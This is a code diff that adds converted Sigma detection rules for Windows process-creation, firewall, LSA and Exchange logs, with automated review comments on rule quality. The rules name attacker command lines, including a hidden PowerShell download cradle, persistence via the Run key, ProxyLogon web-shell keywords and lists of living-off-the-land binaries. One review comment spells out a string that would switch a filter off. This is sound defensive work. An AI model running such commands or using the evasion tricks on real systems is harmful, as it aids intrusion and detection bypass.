a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml new file mode 100644 index 000000000..646cdeb78 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml 
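Review bot: `filter_main` suppresses the whole alert whenever the child's command line merely contains `download.microsoft.com`, `manageengine.com` and `msiexec` — three substrings the attacker fully controls — so appending something like `& rem manageengine.com download.microsoft.com msiexec` to a malicious command line switches the rule off. Since the filter is presumably there for the ManageEngine updater, pin it to the observed benign invocation (e.g. require `NewProcessName|endswith: \msiexec.exe` together with the URL in its expected position) rather than bare substrings anywhere in `CommandLine`. A short comment on `filter_main` quoting the legitimate command it was tuned against would let future reviewers tighten it safely. The rule body continues from the previous hunk line.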
@@ -0,0 +1,34 @@ +title: Potential APT Mustang Panda Activity Against Australian Gov +id: 7806bb49-f653-48d3-a915-5115c1a85234 +status: experimental +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 +references: + - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/15 +tags: + - attack.execution + - attack.g0129 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - copy SolidPDFCreator.dll + - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll + selection_2: + CommandLine|contains|all: + - 'reg ' + - \Windows\CurrentVersion\Run + - SolidPDF + - C:\Users\Public\Libraries\PhotoTvRHD\ + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml new file mode 100644 index 000000000..d7ae05264 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml 
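Review bot: `selection_2` matches a Run-key registration (`\Windows\CurrentVersion\Run`) yet the rule is tagged only `attack.execution`; add `- attack.persistence` and `- attack.t1547.001` to `tags` so the alert maps to what was actually observed. Both selections also hard-code `C:\Users\Public\Libraries\PhotoTvRHD\`, which misses a system whose profiles live on another drive; since `contains` is used, dropping the `C:` prefix (`\Users\Public\Libraries\PhotoTvRHD\`) costs nothing in precision.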
@@ -0,0 +1,39 @@ +title: PaperCut MF/NG Exploitation Related Indicators +id: de1bd0b6-6d59-417c-86d9-a44114aede3b +status: test +description: Detects exploitation indicators related to PaperCut MF/NG Exploitation +references: + - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software + - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - ' /c ' + - powershell + - -nop -w hidden + - Invoke-WebRequest + - setup.msi + - -OutFile + selection_2: + CommandLine|contains|all: + - 'msiexec ' + - '/i ' + - 'setup.msi ' + - '/qn ' + - IntegratorLogin=fimaribahundq + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml new file mode 100644 index 000000000..b5ce9df0e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml 
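Review bot: `selection_2` uses `'setup.msi '` and `'/qn '` with trailing spaces, so an invocation that quotes the package path (`msiexec /i "C:\...\setup.msi" /qn IntegratorLogin=…`) yields `setup.msi"` and never matches even though the campaign-specific `IntegratorLogin=fimaribahundq` token is present. Dropping the trailing space from `'setup.msi '` keeps the intent while surviving quoting; the `'/qn '` token is safe because something always follows it. `selection_1` is a generic PowerShell download-to-`setup.msi` cradle and would warrant `attack.t1059.001`/`attack.t1105` tags, but that is secondary.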
@@ -0,0 +1,45 @@ +title: PaperCut MF/NG Potential Exploitation +id: 0934ac71-a331-4e98-a034-d49c491fbbcb +status: test +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut +references: + - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software + - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml +author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \pc-app.exe + NewProcessName|endswith: + - \bash.exe + - \calc.exe + - \certutil.exe + - \cmd.exe + - \csc.exe + - \cscript.exe + - \dllhost.exe + - \mshta.exe + - \msiexec.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \scriptrunner.exe + - \wmic.exe + - \wscript.exe + - \wsl.exe + condition: process_creation and selection +falsepositives: + - Legitimate administration activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml new file mode 100644 index 000000000..48793077e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml 
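Review bot: The child-process list for `\pc-app.exe` omits binaries that routinely appear in post-exploitation of a web-facing service — `\net.exe`, `\net1.exe`, `\whoami.exe`, `\curl.exe`, `\bitsadmin.exe`, `\sc.exe` — so an attacker who avoids the listed interpreters goes unnoticed, while `\calc.exe` (a PoC artefact) is included. I would extend `NewProcessName|endswith` with those entries, or complement this rule with a broader "any child of pc-app.exe except known-good" selection at a lower level. `falsepositives: Legitimate administration activity` is reasonable, but a comment naming which PaperCut features legitimately spawn `cmd.exe`/`powershell.exe` would make tuning easier; I cannot tell from the hunk whether any do.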
@@ -0,0 +1,26 @@ +title: Peach Sandstorm APT Process Activity Indicators +id: 2e7bbd54-2f26-476e-b4a1-ba5f1a012614 +status: experimental +description: Detects process creation activity related to Peach Sandstorm APT +references: + - https://twitter.com/MsftSecIntel/status/1737895710169628824 + - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details +author: X__Junior (Nextron Systems) +date: 2024/01/15 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: QP's\*(58vaP!tF4 + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml new file mode 100644 index 000000000..b48fc1c81 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml 
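Review bot: The single `CommandLine|contains` selection depends on a field that Security 4688 only carries when the "Include command line in process creation events" policy is enabled; on a default install `CommandLine` is empty and this rule (like the other 4688-based rules in this batch) can never match. That prerequisite should be spelled out in `logsource`, e.g. `definition: 'Requirements: process command line auditing (ProcessCreationIncludeCmdLine_Enabled) must be enabled'`, mirroring how the PowerShell rules document Script Block Logging. The matched token `QP's\*(58vaP!tF4` is a single campaign string, so `level: high` with `falsepositives: Unlikely` is fine, but expect it to age quickly and note the escaped `\*` means a literal asterisk is required.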
@@ -0,0 +1,41 @@ +title: New Firewall Rule Added In Windows Firewall Exception List +id: cde0a575-7d3d-4a49-9817-b8004a7bf105 +status: experimental +description: Detects when a rule has been added to the Windows Firewall exception list +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/09/09 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2004 # A rule has been added to the Windows Defender Firewall exception list + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) + filter_main_block: + Action: 2 + filter_main_installations: + - ApplicationPath|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - ModifyingApplication|startswith: C:\Windows\WinSxS\ # TiWorker.exe + - ModifyingApplication: + - C:\Windows\System32\oobe\Setup.exe + - C:\Windows\SysWOW64\msiexec.exe + - C:\Windows\System32\svchost.exe + - C:\Windows\System32\dllhost.exe + - C:\Program Files\Windows Defender\MsMpEng.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml new file mode 100644 index 000000000..892edad73 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml 
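Review bot: `filter_main_installations` excludes every exception rule whose `ApplicationPath` starts with `C:\Program Files\` or `C:\Program Files (x86)\`, so an attacker with local admin (already required to add a rule) can stage their binary there and open inbound ports without tripping this rule; the exclusion trades detection for quiet at exactly the privilege level where the technique is used. Consider narrowing it to known installer `ModifyingApplication` values instead of the application path, or at least state the trade-off in a comment. The hunk also ships without a `falsepositives` section, and `filter_main_block: Action: 2` lacks a `# Block` annotation explaining why block rules are dropped (the numeric meaning should be confirmed against the 2004 event schema).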
@@ -0,0 +1,46 @@ +title: New Firewall Exception Rule Added For A Suspicious Folder +id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e +related: + - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 + type: derived +status: experimental +description: Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) + - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# +author: frack113 +date: 2023/02/26 +modified: 2023/05/30 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10) + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) + ApplicationPath|contains: + - \AppData\ + - \Temp\ + filter_main_block: + Action: 2 + filter_optional_teams: + ApplicationPath|endswith: \AppData\local\microsoft\teams\current\teams.exe + filter_optional_keybase: + ApplicationPath|endswith: \AppData\Local\Keybase\keybase.exe + filter_optional_messenger: + ApplicationPath|endswith: \AppData\Local\Programs\Messenger\Messenger.exe + filter_optional_opera: + ApplicationPath|startswith: C:\Users\ + ApplicationPath|contains: \AppData\Local\Programs\Opera\ + ApplicationPath|endswith: \opera.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +falsepositives: + - Any legitimate application that runs from the AppData user directory +level: high +ruletype: Sigma 
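Review bot: The `filter_optional_teams`/`keybase`/`messenger`/`opera` exclusions key only on `ApplicationPath`, so a payload written to `%LocalAppData%\Microsoft\Teams\current\teams.exe` is excluded exactly like the real client; path-only allow-lists are the weakest form of exclusion for a rule whose premise is "binary runs from a user-writable folder". If the event exposes it, pair each exclusion with the expected `ModifyingApplication` (the installer or updater that legitimately registered the rule) so both fields must agree. A one-line comment per filter naming the observed benign event (the any.run reference suggests one exists) would let tuners revisit them later.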
diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml new file mode 100644 index 000000000..94121f62b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml @@ -0,0 +1,29 @@ +title: Firewall Rule Modified In The Windows Firewall Exception List +id: 5570c4d9-8fdd-4622-965b-403a5a101aa0 +status: experimental +description: Detects when a rule has been modified in the Windows firewall exception list +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10) + - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files (x86)\ + - C:\Program Files\ + condition: firewall_as and (selection and not 1 of filter_main_*) +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml new file mode 100644 index 000000000..f9ad02f30 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml 
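Review bot: This rule, unlike `win_firewall_as_delete_rule.yml` in the same patch, has no handling for an empty or absent `ModifyingApplication`; if 2005/2073 events can arrive without that field they fall straight through `filter_main_generic` and alert, whereas the delete rule deliberately drops them. Either outcome can be right, but the two rules should agree, and a comment stating the choice (`# empty ModifyingApplication is intentionally NOT filtered here`) would stop someone "fixing" one to match the other. The hunk also lacks a `falsepositives` section, which the `level: low` rating implicitly assumes to be large since every legitimate rule edit fires.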
@@ -0,0 +1,34 @@ +title: All Rules Have Been Deleted From The Windows Firewall Configuration +id: 79609c82-a488-426e-abcf-9f341a39365d +status: experimental +description: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113, Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/17 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer + - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + filter_main_svchost: + ModifyingApplication: C:\Windows\System32\svchost.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml new file mode 100644 index 000000000..40f5dc95b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml 
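Review bot: `filter_main_generic` (anything under Program Files) and `filter_main_svchost` silence a `level: high` event — every firewall rule wiped — without a comment saying which legitimate operation produced each, unlike the `# TiWorker.exe` note in `win_firewall_as_add_rule.yml`. Add a comment per filter (e.g. `# svchost.exe: firewall service applying a policy-driven reset – verify`) so a tuner can decide whether the exclusion is still justified; a full rule wipe initiated from a Program Files binary is precisely what a tampered installer or dropped tool would look like. A `falsepositives` section is also missing.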
@@ -0,0 +1,38 @@ +title: A Rule Has Been Deleted From The Windows Firewall Exception List +id: c187c075-bb3e-4c62-b4fa-beae0ffc211f +status: experimental +description: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/06/12 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2006 # A rule has been deleted in the Windows Defender Firewall exception list + - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + filter_main_svchost: + ModifyingApplication: C:\Windows\System32\svchost.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + filter_main_null: + ModifyingApplication: + filter_main_empty: + ModifyingApplication: '' + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml new file mode 100644 index 000000000..101598083 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml 
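Review bot: The description ("Detects when a single rules or all of the rules have been deleted") is both ungrammatical and inaccurate: 2006/2052 are single-rule deletions, and the all-rules case is handled by `win_firewall_as_delete_all_rules.yml`; I would change it to `Detects when a rule has been deleted from the Windows Defender Firewall exception list`. The `filter_main_null`/`filter_main_empty` pair deliberately drops deletions with no `ModifyingApplication`, and a comment on why those events are treated as noise rather than suspicious (`# events without a modifying application are … – confirm source`) would help, because a deletion with no recorded actor is arguably the more interesting case.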
@@ -0,0 +1,23 @@ +title: The Windows Defender Firewall Service Failed To Load Group Policy +id: 7ec15688-fd24-4177-ba43-1a950537ee39 +status: test +description: Detects activity when The Windows Defender Firewall service failed to load Group Policy +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/01/17 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml new file mode 100644 index 000000000..802f9f5bb --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml 
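Review bot: The rule fires on every 2009 event but ships no `falsepositives` section, and a Group Policy load failure is presumably at least as often an infrastructure fault as a defence-evasion attempt, so the `attack.t1562.004` mapping deserves a caveat in `description` (e.g. `usually operational; review alongside other firewall-as events`). I would add `falsepositives: - Domain controller or SYSVOL unreachable during policy refresh` so the `level: low` rating is explained rather than implied.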
@@ -0,0 +1,25 @@ +title: Windows Defender Firewall Has Been Reset To Its Default Configuration +id: 04b60639-39c0-412a-9fbe-e82499c881a3 +status: experimental +description: Detects activity when Windows Defender Firewall has been reset to its default configuration +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2032 # Windows Defender Firewall has been reset to its default configuration + - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11) + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml new file mode 100644 index 000000000..2802ecf9a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml 
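Review bot: `level: low` looks inconsistent with the sibling rules: a reset to default configuration (2032/2060) discards every custom firewall rule, the same outcome `win_firewall_as_delete_all_rules.yml` rates `high`, yet here there is no `ModifyingApplication` filter and no `falsepositives` section. Either raise the level and reuse the delete-all rule's `ModifyingApplication` exclusions, or document in `description` why a reset is treated as routine — for instance if some imaging or provisioning step performs it, which I cannot confirm from the hunk.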
@@ -0,0 +1,29 @@ +title: Windows Firewall Settings Have Been Changed +id: 00bb5bd5-1379-4fcf-a965-a5b6f7478064 +status: experimental +description: Detects activity when the settings of the Windows firewall have been changed +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113, Nasreddine Bencherchali (Nextron Systems) +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2002 # A Windows Defender Firewall setting has changed. + - 2083 # A Windows Defender Firewall setting has changed. (Windows 11) + - 2003 # A Windows Firewall setting in the profile has changed + - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11) + - 2008 # Windows Firewall Group Policy settings have changed. The new settings have been applied + # - 2010 # Network profile changed on an interface. + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml b/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml new file mode 100644 index 000000000..3b94568d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml 
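Review bot: The rule alerts on any setting change (2002/2083/2003/2082/2008) without distinguishing which setting changed, so a firewall profile being switched off is indistinguishable from a log-path tweak, and 2008 will also fire on every Group Policy refresh that touches firewall settings. If the 2003/2082 payload exposes the setting name and value (to be confirmed from the event schema), a companion selection for the profile-disabled case at a higher level would give analysts a signal worth acting on, leaving this rule as the low-level audit trail. A `falsepositives` section is missing here too.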
@@ -0,0 +1,39 @@
+title: Standard User In High Privileged Group
+id: 7ac407cc-0f48-4328-aede-de1d2e6fef41
+status: experimental
+description: Detect standard users login that are part of high privileged groups such as the Administrator group
+references:
+ - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
+ - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
+ - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml
+author: frack113
+date: 2023/01/13
+modified: 2023/05/05
+tags:
+ - attack.credential_access
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: lsa-server
+ definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.'
+detection:
+ lsa_server:
+ Channel: Microsoft-Windows-LSA/Operational
+ selection:
+ EventID: 300
+ TargetUserSid|startswith: S-1-5-21- # Standard user
+ SidList|contains:
+ - S-1-5-32-544 # Local admin
+ - -500} # Domain admin
+ - -518} # Schema admin
+ - -519} # Enterprise admin
+ filter_main_admin:
+ TargetUserSid|endswith:
+ - '-500' # Domain admin
+ - '-518' # Schema admin
+ - '-519' # Enterprise admin
+ condition: lsa_server and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the "TargetUserName" field
+level: medium
+ruletype: Sigma
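Review bot: The `# Domain admin` comment on the `-500}` entry of `SidList|contains`, and on the matching `'-500'` entry of `filter_main_admin`, labels RID 500, which is the well-known built-in Administrator account rather than the Domain Admins group (RID 512); the rule never lists 512, so membership in Domain Admins alone does not appear to trigger it. RIDs 518 and 519 are likewise group RIDs (Schema Admins, Enterprise Admins), so the `TargetUserSid|endswith` entries `'-518'` and `'-519'` in `filter_main_admin` look like dead filter terms, since a user SID does not end in a group RID. Suggested comment fix: `- -500} # Built-in Administrator account`, plus `- -512} # Domain Admins` if the Domain Admins group is what the rule intends to match. Because this file is converter output under tools/sigmac/converted_rules, the correction belongs in the upstream Sigma rule rather than in this generated copy.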
diff --git a/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml
new file mode 100644
index 000000000..e568c3cfc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml
@@ -0,0 +1,32 @@
+title: ProxyLogon MSExchange OabVirtualDirectory
+id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0
+status: test
+description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
+references:
+ - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
+author: Florian Roth (Nextron Systems)
+date: 2021/08/09
+modified: 2023/01/23
+tags:
+ - attack.t1587.001
+ - attack.resource_development
+logsource:
+ product: windows
+ service: msexchange-management
+detection:
+ msexchange_management:
+ Channel: MSExchange Management
+ keywords_cmdlet:
+ '|all':
+ - OabVirtualDirectory
+ - ' -ExternalUrl '
+ keywords_params:
+ - eval(request
+ - http://f/
